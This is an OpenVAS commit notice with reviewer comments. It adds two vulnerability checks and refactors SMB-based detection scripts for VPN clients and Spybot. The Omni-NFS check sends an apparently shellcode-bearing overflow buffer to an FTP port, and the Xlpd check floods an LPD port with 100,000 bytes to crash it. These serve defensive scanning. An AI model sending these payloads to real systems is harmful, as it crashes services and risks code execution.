[Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Oct 8 20:03:38 CEST 2009
Author: mime
Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009)
New Revision: 5443
Added:
trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
trunk/openvas-plugins/scripts/Xlpd_36610.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/cve_current.txt
trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
trunk/openvas-plugins/scripts/secpod_smb_func.inc
trunk/openvas-plugins/scripts/smb_explorer_version.nasl
trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
trunk/openvas-plugins/scripts/spybot_detection.nasl
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/ChangeLog 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,5 +1,21 @@
2009-10-08 Michael Meyer <michael.meyer at intevation.de>
+ * scripts/Xlpd_36610.nasl,
+ scripts/Omni_NFS_36608.nasl:
+ Added new plugins.
+
+ * scripts/spybot_detection.nasl,
+ scripts/cisco_vpn_client_detect.nasl,
+ scripts/smb_explorer_version.nasl,
+ scripts/sonicwall_vpn_client_detect.nasl:
+ Modified so that they don't need smb_func.inc
+ anymore.
+
+ * scripts/secpod_smb_func.inc:
+ Added function GetVersionFromFile().
+
+2009-10-08 Michael Meyer <michael.meyer at intevation.de>
+
* scripts/showmount.nasl:
Added script_copyright().
Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/cve_current.txt 2009-10-08 18:03:34 UTC (rev 5443)
@@ -119,3 +119,5 @@
CVE-2009-3562 SecPod
CVE-2009-3561 SecPod
CVE-2009-3525 SecPod
+36610 Greenbone svn R
+36608 Greenbone svn R
Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,123 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100297);
+ script_bugtraq_id(36608);
+ script_version ("1.0-$Revision$");
+
+ script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities");
+
+desc = "Overview:
+Omni-NFS is prone to multiple stack-based buffer-overflow
+vulnerabilities because the application fails to properly bounds-check
+user-supplied network data before copying it into an insufficiently
+sized memory buffer. The issues affect both server and client.
+
+Exploiting these issues allows attackers to execute arbitrary machine
+code in the context of users running the affected application. Failed
+attempts will likely crash the application, resulting in denial-of-
+service conditions.
+
+Omni-NFS 5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36608
+http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow");
+ script_category(ACT_DENIAL);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/ftp");
+if(!port)port = 21;
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+if(!get_port_state(port))exit(0);
+
+banner = get_ftp_banner(port:port);
+
+if("XLINK" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+crapdata = crap(length:30000);
+
+req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39,
+0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10,
+0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40,
+0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37,
+0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c,
+0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a,
+0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35,
+0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32,
+0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87,
+0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09,
+0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76,
+0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24,
+0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0,
+0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff,
+0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1,
+0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33,
+0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a);
+
+send(socket:soc, data:req);
+close(soc);
+
+sleep(10);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+
+} else {
+
+ for(i=0;i<5;i++) {
+ if(!ftp_recv_line(socket:soc1)) {
+ security_warning(port:port);
+ close(soc1);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
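Review bot: The liveness check at the end of the script can report a healthy server: the `for(i=0;i<5;i++)` loop calls `ftp_recv_line` five times on `soc1` without sending any command, so unless the service volunteers five replies, the second read presumably comes back empty and `security_warning` fires. Reading the greeting once would be enough, e.g. `banner = ftp_recv_line(socket:soc1); close(soc1); if(!banner) security_warning(port:port);`, which also closes `soc1` on the path where the loop currently falls through to `exit(0)` with the socket open. Separately, the description ends with `Risk factor : Low` although its text describes arbitrary code execution, while the sibling Xlpd plugin rates a denial of service as Medium.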
Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Xlpd Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100296);
+ script_bugtraq_id(36610);
+ script_version ("1.0-$Revision$");
+
+ script_name("Xlpd Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Xlpd is prone to a denial-of-service vulnerability because it fails to
+adequately validate user-supplied input.
+
+An attacker can exploit this issue to crash the affected application,
+denying service to legitimate users. Given the nature of this issue,
+the attacker may also be able to run arbitrary code, but this has not
+been confirmed.
+
+Xlpd 3.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36610
+http://www.netsarang.com/products/xlp_detail.html
+http://www.securityfocus.com/archive/1/507029
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability");
+ script_category(ACT_DENIAL);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/lpd", 515);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/lpd");
+if(!port)port="515";
+
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = crap(data:raw_string(0x41),length:100000);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+} else {
+ close(soc1);
+}
+
+exit(0);
+
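Review bot: A single failed reconnect two seconds after the send is treated as proof of a crash, and nothing before the send confirms that the listener is Xlpd (the Omni-NFS plugin in this commit at least checks the banner for `XLINK`). Any LPD implementation or intermediate device that briefly refuses connections after a 100000-byte write would be reported, and every listener on the port receives the disruptive data when safe checks are off. Consider retrying the connect a few times before calling `security_warning`, and add a comment stating that the test cannot identify the product. The fallback `port="515"` is a string where the Omni-NFS script uses the integer `21`; `if(!port)port=515;` would be consistent.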
Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,31 +1,7 @@
-#
# Script Written By Ferdy Riphagen
# Script distributed under the GNU GPLv2 License.
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
-desc = "
-Synopsis :
-
-There is a VPN client installed on the remote Windows host.
-
-Description :
-
-The Cisco VPN Client is installed on the remote Windows host. This
-software can be used for secure connectivity.
-
-See also :
-
-http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html
-
-Risk factor :
-
-None";
-
if (description) {
script_id(80037);
script_version("$Revision: 1.5 $");
@@ -33,107 +9,45 @@
name = "Cisco VPN Client Version Detection";
script_name(name);
+
+ desc = "Overview: This script is detects the installed version of Cisco VPN
+ Client and sets the result in KB.
+
+ Risk Factor: Informational";
+
summary = "Detects the version number of the Cisco VPN Client in use";
script_summary(summary);
script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen");
-
script_require_ports(139, 445);
script_dependencies("secpod_reg_enum.nasl");
script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport");
exit(0);
}
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-function cleanup(opt) {
-
- if (opt == 1) exit(0);
- else if (opt == 2) {
- NetUseDel();
- exit(0);
- }
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
}
-# modified 'get_dword' to get the bytes in the right format.
-function get_dword2(blob, pos) {
- global_var blob, pos;
-
- if (pos > (strlen(blob) - 4)) return NULL;
- return (ord(blob[pos]) << 16) +
- (ord(blob[pos+1]) << 24) +
- (ord(blob[pos+2])) +
- (ord(blob[pos+3]) << 8);
+if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){
+ exit(0);
}
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if (ipc != 1) cleanup(opt:2);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) cleanup(opt:2);
-
key = "SOFTWARE\Cisco Systems\VPN Client";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- value = RegQueryValue(handle:regopen, item:"InstallPath");
- RegCloseKey(handle:regopen);
- RegCloseKey(handle:hklm);
- if(!isnull(value)) path = value[1];
- else cleanup(opt:2);
-}
-else cleanup(opt:2);
+path = registry_get_sz(key:key, item:"InstallPath");
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) cleanup(opt:1);
-
-fopen = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-
-if (isnull(fopen)) cleanup(opt:2);
-ret = GetFileVersionEx(handle:fopen);
-CloseFile(handle:fopen);
-
-if (!isnull(ret)) children = ret['Children'];
-if (!isnull(children)) info = children['VarFileInfo'];
-if (isnull(info)) cleanup(opt:2);
-
-trans = toupper(hexstr(dec2hex(
- num:get_dword2(
- blob:info['Translation'], pos:0))));
-if (isnull(trans)) cleanup(opt:2);
-
-fileinfo = children['StringFileInfo'];
-if (!isnull(fileinfo)) data = fileinfo[trans];
-if (!isnull(data)) ver = data['ProductVersion'];
-
-if (!isnull(ver)) {
- set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver);
- report = string(
- desc, "\n\n",
- "Plugin output :\n\n",
- "Version ", ver, " of the Cisco VPN Client is installed.\n"
- );
- security_note(port:port, data:report);
+if(path)
+{
+ file = path + "\vpngui.exe";
+ version = GetVersionFromFile(file:file,verstr:"prod");
+ if(!isnull(version)){
+ set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version);
+ exit(0);
+ }
}
-cleanup(opt:2);
+
+exit(0);
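Review bot: `file = path + "\vpngui.exe"` inserts a separator that the removed code did not (its replacement string was `\1vpngui.exe`), which suggests `InstallPath` already ends in a backslash. If that is the case, the new path contains a doubled backslash and the file open may fail, leaving `SMB/CiscoVPNClient/Version` unset with no diagnostic. In the description block, which starts above this hunk, the new `desc` text reads "This script is detects", and no `script_description(desc)` call is visible after the assignment, so it is worth confirming the text is actually registered. The key literal is also written twice; assigning `key` first and using `registry_key_exists(key:key)` would match the SonicWall script.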
Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 18:03:34 UTC (rev 5443)
@@ -695,3 +695,64 @@
(ord(data[2]) << 16) + (ord(data[3]) << 24));
}
}
+
+function GetVersionFromFile(file, verstr) {
+
+ local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver;
+
+ mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file);
+ file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file);
+
+ soc = open_sock_tcp(port);
+ if(!soc){
+ return NULL;
+ }
+
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+ domain:domain, prot:prot);
+ if(!r)
+ {
+ close(soc);
+ return NULL;
+ }
+
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare);
+
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+ close(soc);
+ return NULL;
+ }
+ fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);
+ if(!fid)
+ {
+ close(soc);
+ return NULL;
+ }
+ if(isnull(verstr)) {
+ ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);
+ } else {
+ ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr);
+ }
+ close(soc);
+
+ return ver;
+
+
+}
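Review bot: GetVersionFromFile() reads `port`, `name`, `login`, `pass` and `domain`, none of which are parameters or listed in `local_var`, so it only works when the including script has set globals with exactly those names. The cisco_vpn_client_detect.nasl and sonicwall_vpn_client_detect.nasl hunks in this commit remove their `kb_smb_*()` assignments, so unless another include defines these names the function would call `open_sock_tcp()` with an unset port and return NULL, and no version would reach the KB. Resolving the values inside the function removes that hidden dependency (this assumes the `kb_smb_*` helpers are loaded by the caller, as in the spybot script). The drive-letter patterns are also unanchored and upper-case only, where the code removed from the callers used `^([A-Za-z]):.*`. In addition, `fid` is missing from `local_var`, and the `smb_tconx` reply is passed on unchecked.

```nasl
function GetVersionFromFile(file, verstr) {

  local_var share, mshare, soc, r, prot, uid, tid, fid, ver;
  local_var name, login, pass, domain, port;

  # Resolve the connection details here instead of relying on caller globals.
  name   = kb_smb_name();
  login  = kb_smb_login();
  pass   = kb_smb_password();
  domain = kb_smb_domain();
  port   = kb_smb_transport();
  if(!port) port = 139;

  # Anchored, case-insensitive drive letter, as in the code this replaces.
  mshare = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:file);
  file   = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1", string:file);

  # ... unchanged: session request, negotiate, session setup, tree connect, OpenAndX, GetVersion ...
```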
Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -97,7 +97,7 @@
#==================================================================#
# Main code #
#==================================================================#
-include("smb_func.inc");
+
warning = 0;
access = get_kb_item("SMB/registry_full_access");
Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,34 +1,17 @@
#
# Script Written By Ferdy Riphagen
# Script distributed under the GNU GPLv2 License.
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
if (description) {
script_id(80044);
script_version("$Revision: 1.1 $");
- desc = "
-Synopsis :
+ desc = "Overview: This script detects the installed version of
+SonicWall Global VPN Client and sets the result in KB.
-There is a VPN client installed on the remote host.
+Risk Factor: Informational";
-Description :
-
-The SonicWall Global VPN Client is installed on the remote system. This
-software can be used to establish secure remote connections.
-
-See also :
-
-http://www.sonicwall.com/
-
-Risk factor :
-
-None";
script_description(desc);
name = "SonicWall Global VPN Client Detection";
@@ -37,7 +20,7 @@
script_summary(summary);
script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen");
script_require_ports(139, 445);
@@ -46,83 +29,30 @@
exit(0);
}
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if (ipc != 1) exit(0);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) {
- NetUseDel();
- exit(0);
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
}
-path = NULL;
key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- value = RegQueryValue(handle:regopen, item:"Path");
- RegCloseKey(handle:regopen);
- RegCloseKey(handle:hklm);
- if(!isnull(value)) path = value[1];
-}
-if (isnull(path)) {
- RegCloseKey(handle:hklm);
- NetUseDel();
- exit(0);
-}
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) {
- NetUseDel();
- exit(0);
+if(!registry_key_exists(key:key)){
+ exit(0);
}
-fopen = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
+path = registry_get_sz(key:key, item:"Path");
-if (isnull(fopen)) {
- NetUseDel();
- exit(0);
-}
+if(path) {
-ret = GetFileVersion(handle:fopen);
-CloseFile(handle:fopen);
-NetUseDel();
+ file = path + "\SWGVpnClient.exe";
+ version = GetVersionFromFile(file:file,verstr:"prod");
+ if(!isnull(version)){
+ set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version);
+ set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
+ exit(0);
+ }
+}
-if (!isnull(ret))
-{
- ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]);
-
- set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver);
- set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
-
- report = string("\n",
- "Version ", ver, " of the SonicWall Global VPN Client is installed\n",
- "under :\n",
- "\n",
- " ", path
- );
- security_note(port:port, extra:report);
-}
exit(0);
Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,15 +1,9 @@
#
# (C) Josh Zlatin-Amishav and Tenable Network Security
# GPLv2
-#
-# Tenable grants a special exception for this plugin to use the library
-# 'smb_func.inc'. This exception does not apply to any modified version of
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation,de>
- desc = "
-Synopsis :
+ desc = "Synopsis :
The remote Windows host has a spyware detection program installed on it.
@@ -20,11 +14,9 @@
kinds from your computer.
See also :
-
http://www.safer-networking.org/
Risk factor :
-
None";
if(description)
@@ -34,195 +26,175 @@
name = "Spybot Search & Destroy Detection";
script_name(name);
-
+
script_description(desc);
-
+
summary = "Checks whether Spybot Search & Destroy is installed";
script_summary(summary);
script_category(ACT_GATHER_INFO);
-
+
script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security");
- family = "Windows";
+ family = "Service detection";
script_family(family);
-
+
script_dependencies("secpod_reg_enum.nasl");
- script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
+ script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
script_require_ports(139, 445);
exit(0);
}
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
+include("global_settings.inc");
-include("smb_func.inc");
-include("secpod_reg.inc");
+ if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
+ }
+ name = kb_smb_name();
+ login = kb_smb_login();
+ pass = kb_smb_password();
+ domain = kb_smb_domain();
+ port = kb_smb_transport();
-name = kb_smb_name();
-login = kb_smb_login();
-pass = kb_smb_password();
-domain = kb_smb_domain();
-port = kb_smb_transport();
+ if(!port) port = 139;
+ if(!get_port_state(port))exit(0);
-if(!get_port_state(port))exit(0);
-soc = open_sock_tcp(port);
-if(!soc)exit(1);
+ soc = open_sock_tcp(port);
+ if(!soc){
+ exit(0);
+ }
-session_init(socket:soc, hostname:name);
-r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if ( r != 1 )
-{
- NetUseDel();
- exit(0);
-}
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+ close(soc);
+ exit(0);
+ }
-# First find where the executable is installed on the remote host
-# Connect to remote registry.
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm))
-{
- if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0);
- NetUseDel();
- exit(0);
-}
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+ domain:domain, prot:prot);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$");
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+ close(soc);
+ exit(0);
+ }
-# Determine where Spybot S&D is installed
-key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1";
-key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(key_h)) {
- value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path");
- if (!isnull(value)) path = value[1];
- else path = NULL;
-
- RegCloseKey(handle:key_h);
-}
-else path = NULL;
-RegCloseKey(handle:hklm);
+ r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg");
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
-if (isnull(path)) {
- NetUseDel();
- exit(0);
-}
+ pipe = smbntcreatex_extract_pipe(reply:r);
+ if(!pipe)
+ {
+ close(soc);
+ exit(0);
+ }
+ r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!r)
+ {
+ close(soc);
+ exit(0);
+ }
-# Get the file version / latest sigs.
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SpybotSD.exe", string:path);
-rules = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\Updates\downloaded.ini", string:path);
-
-r = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (r != 1) {
- if (log_verbosity > 1) debug_print("can't connect to the remote share (", r, ")!", level:0);
- NetUseDel();
- exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+ close(soc);
+ exit(0);
+ }
-fh = CreateFile(
- file:exe,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
- if (log_verbosity > 1) debug_print("can't open ", exe, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!handle)
+ {
+ close(soc);
+ exit(0);
+ }
-version = GetFileVersion(handle:fh);
-CloseFile(handle:fh);
-if (isnull(version))
-{
- if (log_verbosity > 1) debug_print("can't get file version for ", exe, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
